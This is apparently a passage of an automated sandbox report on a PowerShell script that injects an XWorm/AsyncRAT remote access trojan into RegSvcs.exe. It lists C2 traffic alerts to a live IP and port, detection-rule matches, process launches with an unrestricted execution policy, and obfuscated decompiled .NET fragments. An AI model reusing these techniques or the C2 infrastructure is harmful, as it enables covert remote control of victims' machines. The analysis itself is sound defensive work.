Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData

Networking

Source: Network traffic Suricata IDS: 2858800 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.7:49714 -> 176.113.115.170:4412
Source: Network traffic Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 176.113.115.170:4412 -> 192.168.2.7:49714
Source: Network traffic Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.7:49714 -> 176.113.115.170:4412
Source: Network traffic Suricata IDS: 2858801 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound : 176.113.115.170:4412 -> 192.168.2.7:49714
Source: Network traffic Suricata IDS: 2858799 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.7:49714 -> 176.113.115.170:4412
Source: Malware configuration extractor URLs: 176.113.115.170
Source: global traffic TCP traffic: 192.168.2.7:49714 -> 176.113.115.170:4412
Source: Joe Sandbox View ASN Name: SELECTELRU SELECTELRU
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: powershell.exe, 00000000.00000002.1361364825.0000024AA0D94000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1341599146.0000024A91DF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000000.00000002.1341599146.0000024A90D37000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000000.00000002.1341599146.0000024A90B11000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.3662994755.00000000031F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Amcache.hve.18.dr | String found in binary or memory: http://upx.sf.net
            Source: powershell.exe, 00000000.00000002.1341599146.0000024A90D37000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000000.00000002.1341599146.0000024A90B11000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 00000000.00000002.1341599146.0000024A91DF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000000.00000002.1341599146.0000024A91DF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000000.00000002.1341599146.0000024A91DF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000000.00000002.1341599146.0000024A90D37000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000000.00000002.1341599146.0000024A90F6F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
            Source: powershell.exe, 00000000.00000002.1361364825.0000024AA0D94000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1341599146.0000024A91DF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window created: window name: CLIPBRDWNDCLASS

            System Summary

            Source: 0.2.powershell.exe.24a90f10d10.3.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.powershell.exe.24a90f10d10.3.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.powershell.exe.24a91d29520.4.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.powershell.exe.24a91d29520.4.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.powershell.exe.24a90f10d10.3.raw.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.powershell.exe.24a90f10d10.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.powershell.exe.24a91d29520.4.raw.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.2.powershell.exe.24a91d29520.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0000000A.00000002.3659100760.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000000.00000002.1341599146.0000024A919E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000000.00000002.1341599146.0000024A90D37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000000.00000002.1341599146.0000024A90F6F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process Stats: CPU usage > 49%
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFAACA3554A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFAACA3211D
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFAACA3A9D9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFAACA35FA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_03046340
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_0304C2D8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_0304B598
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_030484B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_03045A70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_03042C88
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_03045728
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 10_2_03040FA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7336 -s 1420
            Source: 0.2.powershell.exe.24a90f10d10.3.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.powershell.exe.24a90f10d10.3.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.powershell.exe.24a91d29520.4.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.powershell.exe.24a91d29520.4.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.powershell.exe.24a90f10d10.3.raw.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.powershell.exe.24a90f10d10.3.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.powershell.exe.24a91d29520.4.raw.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.2.powershell.exe.24a91d29520.4.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0000000A.00000002.3659100760.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000000.00000002.1341599146.0000024A919E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000000.00000002.1341599146.0000024A90D37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000000.00000002.1341599146.0000024A90F6F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.powershell.exe.24a90f10d10.3.raw.unpack, g3vLTCbXUu.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.powershell.exe.24a90f10d10.3.raw.unpack, gu9bOeQlhx.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.powershell.exe.24a91d29520.4.raw.unpack, g3vLTCbXUu.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.powershell.exe.24a91d29520.4.raw.unpack, gu9bOeQlhx.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.powershell.exe.24a90f10d10.3.raw.unpack, wMziNr7YQaG4tCngR7hQC89Pal5rBGWte679.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.2.powershell.exe.24a90f10d10.3.raw.unpack, wMziNr7YQaG4tCngR7hQC89Pal5rBGWte679.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.powershell.exe.24a91d29520.4.raw.unpack, wMziNr7YQaG4tCngR7hQC89Pal5rBGWte679.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.2.powershell.exe.24a91d29520.4.raw.unpack, wMziNr7YQaG4tCngR7hQC89Pal5rBGWte679.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engine | Classification label: mal100.troj.evad.winPS1@7/10@0/1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutant created: NULL
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutant created: \Sessions\1\BaseNamedObjects\ukwmDtxIT3xNIMhL
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7096:120:WilError_03
            Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7336
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tanhfh4q.da5.ps1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
            Source: 176.113.115_1.170.ps1 | Virustotal: Detection: 18%
            Source: 176.113.115_1.170.ps1 | ReversingLabs: Detection: 13%
            Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115_1.170.ps1"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: linkinfo.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntshrui.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cscapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: taskflowdataengine.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cdp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: umpdc.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dsreg.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
            Source: C:\Windows\System32\ipconfig.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\System32\ipconfig.exe | Section loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\ipconfig.exe | Section loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\ipconfig.exe | Section loaded: dnsapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbW source: RegSvcs.exe, 0000000A.00000002.3659546124.0000000001564000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RegSvcs.exe, 0000000A.00000002.3682055554.0000000005A2B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: RegSvcs.exe, 0000000A.00000002.3659546124.0000000001564000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\exe\RegSvcs.pdbi source: RegSvcs.exe, 0000000A.00000002.3659546124.0000000001564000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Xml.ni.pdb source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: RegSvcs.exe, 0000000A.00000002.3659546124.0000000001564000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.ni.pdbRSDS source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: System.Management.pdbx source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: @[o.pdbsw source: RegSvcs.exe, 0000000A.00000002.3682055554.0000000005A2B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb4 source: RegSvcs.exe, 0000000A.00000002.3659546124.0000000001564000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.PDBsg] source: RegSvcs.exe, 0000000A.00000002.3659546124.0000000001564000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.pdb89O source: RegSvcs.exe, 0000000A.00000002.3659546124.0000000001564000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.pdb source: RegSvcs.exe, 0000000A.00000002.3659546124.0000000001564000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: #.dll.pdb source: powershell.exe, 00000000.00000002.1341599146.0000024A919E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1341539656.0000024A90AB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000000.00000002.1341599146.0000024A90D37000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.ni.pdb source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: mscorlib.ni.pdbRSDS source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: Microsoft.VisualBasic.pdbH source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: System.Configuration.pdb source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: System.Xml.pdb source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: System.pdb source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: System.Xml.ni.pdbRSDS# source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: System.Core.ni.pdb source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: Microsoft.VisualBasic.pdb source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: System.Xml.pdbO source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: System.Windows.Forms.pdb source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: mscorlib.pdb source: RegSvcs.exe, 0000000A.00000002.3683262361.0000000006B28000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.3659546124.0000000001564000.00000004.00000020.00020000.00000000.sdmp, WERACBB.tmp.dmp.18.dr
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: RegSvcs.exe, 0000000A.00000002.3659546124.0000000001564000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: mscorlib.pdb246122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32x source: RegSvcs.exe, 0000000A.00000002.3659546124.0000000001564000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Drawing.pdb source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: System.Management.pdb source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: mscorlib.ni.pdb source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: \??\C:\Windows\RegSvcs.pdb source: RegSvcs.exe, 0000000A.00000002.3659546124.000000000153C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.ni.pdb source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: \??\C:\Windows\mscorlib.pdb-SJ source: RegSvcs.exe, 0000000A.00000002.3659546124.000000000153C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: \??\C:\Windows\symbols\exe\RegSvcs.pdbX source: RegSvcs.exe, 0000000A.00000002.3659546124.0000000001564000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: symbols\dll\mscorlib.pdbLb source: RegSvcs.exe, 0000000A.00000002.3682055554.0000000005A2B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: HPOo0C:\Windows\mscorlib.pdb source: RegSvcs.exe, 0000000A.00000002.3682055554.0000000005A2B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\exe\RegSvcs.pdb source: RegSvcs.exe, 0000000A.00000002.3659546124.0000000001564000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ?[oC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbD source: RegSvcs.exe, 0000000A.00000002.3682055554.0000000005A2B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb s source: RegSvcs.exe, 0000000A.00000002.3659546124.0000000001564000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: System.ni.pdb source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: System.Core.ni.pdbRSDS source: WERACBB.tmp.dmp.18.dr

            Data Obfuscation

            Source: 0.2.powershell.exe.24a90f10d10.3.raw.unpack, MvPAVnKqIH8ISu8gBJYY5gmCJsP0omLwRqEJtDvJXsXmZ0jFpjX6eble6AAlklEr1RPW.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_1drXMZguCyjkS69w9843xRQWae29G0Rkg635mHuuLYoWVbvm6H.dLJPDdcnEB9Ryo3voJBtwByyX3jjekjmR8inZ248xeorAqp7aT,_1drXMZguCyjkS69w9843xRQWae29G0Rkg635mHuuLYoWVbvm6H._86oD7O9CdPNRJUhwMZezIFe4l8dPJlx5u8m8PlLWT4Wt6sQiJY,_1drXMZguCyjkS69w9843xRQWae29G0Rkg635mHuuLYoWVbvm6H.PA4Un7xVNvWhpahuqjh5Y3O425ZhHVE8kqZl,_1drXMZguCyjkS69w9843xRQWae29G0Rkg635mHuuLYoWVbvm6H.WFCAstKfN2gtu4FfocLdbZGGqqYvKz8fT7xXe6mh990ANevPjt,gu9bOeQlhx.lSNVNSUCuC()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 0.2.powershell.exe.24a90f10d10.3.raw.unpack, MvPAVnKqIH8ISu8gBJYY5gmCJsP0omLwRqEJtDvJXsXmZ0jFpjX6eble6AAlklEr1RPW.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{V2nmRLmSKF1CEazyoHYuo6m9emt17bq2u60rUAxnzDvQJcK4a9rBHo9H9fLDI1cmnLG6[2],gu9bOeQlhx._7pHqSkwgqs(Convert.FromBase64String(V2nmRLmSKF1CEazyoHYuo6m9emt17bq2u60rUAxnzDvQJcK4a9rBHo9H9fLDI1cmnLG6[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 0.2.powershell.exe.24a91d29520.4.raw.unpack, MvPAVnKqIH8ISu8gBJYY5gmCJsP0omLwRqEJtDvJXsXmZ0jFpjX6eble6AAlklEr1RPW.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_1drXMZguCyjkS69w9843xRQWae29G0Rkg635mHuuLYoWVbvm6H.dLJPDdcnEB9Ryo3voJBtwByyX3jjekjmR8inZ248xeorAqp7aT,_1drXMZguCyjkS69w9843xRQWae29G0Rkg635mHuuLYoWVbvm6H._86oD7O9CdPNRJUhwMZezIFe4l8dPJlx5u8m8PlLWT4Wt6sQiJY,_1drXMZguCyjkS69w9843xRQWae29G0Rkg635mHuuLYoWVbvm6H.PA4Un7xVNvWhpahuqjh5Y3O425ZhHVE8kqZl,_1drXMZguCyjkS69w9843xRQWae29G0Rkg635mHuuLYoWVbvm6H.WFCAstKfN2gtu4FfocLdbZGGqqYvKz8fT7xXe6mh990ANevPjt,gu9bOeQlhx.lSNVNSUCuC()}}, (string[])null, (Type[])null, (bool[])null, true)
